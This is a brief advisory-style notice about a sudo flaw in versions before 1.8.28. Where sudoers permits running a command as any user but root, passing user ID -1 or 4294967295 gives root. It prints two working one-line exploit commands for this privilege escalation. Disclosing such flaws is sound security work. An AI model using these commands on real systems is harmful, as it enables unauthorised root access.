A bug in sudo allows any executable file to be executed as root if /etc/sudoers allows it to be executed as other users and is prohibited for root.
Exploiting the error is very simple:
sudo -u#-1 id -u
or:
sudo -u#4294967295 id -u
The bug is present in all versions of sudo before 1.8.28
